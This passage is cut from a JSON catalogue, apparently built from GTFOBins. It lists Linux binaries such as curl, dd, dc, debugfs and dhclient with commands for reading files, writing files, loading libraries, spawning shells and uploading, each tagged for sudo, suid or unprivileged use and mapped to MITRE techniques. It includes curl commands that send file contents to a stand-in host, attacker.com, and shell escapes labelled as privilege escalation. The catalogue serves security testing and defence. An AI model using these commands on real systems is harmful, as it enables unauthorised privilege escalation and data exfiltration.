compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:sudo","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:suid","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:unprivileged","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:sudo","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:suid","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:unprivileged","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:sudo","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:suid","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:unprivileged","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:sudo","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:suid","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:unprivileged","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dhclient:shell:0:sudo","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dhclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dhclient:shell:0:unprivileged","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dhclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:sudo","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:suid","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:unprivileged","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dig:file-read:0:sudo","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dig:file-read:0:suid","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dig:file-read:0:unprivileged","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and 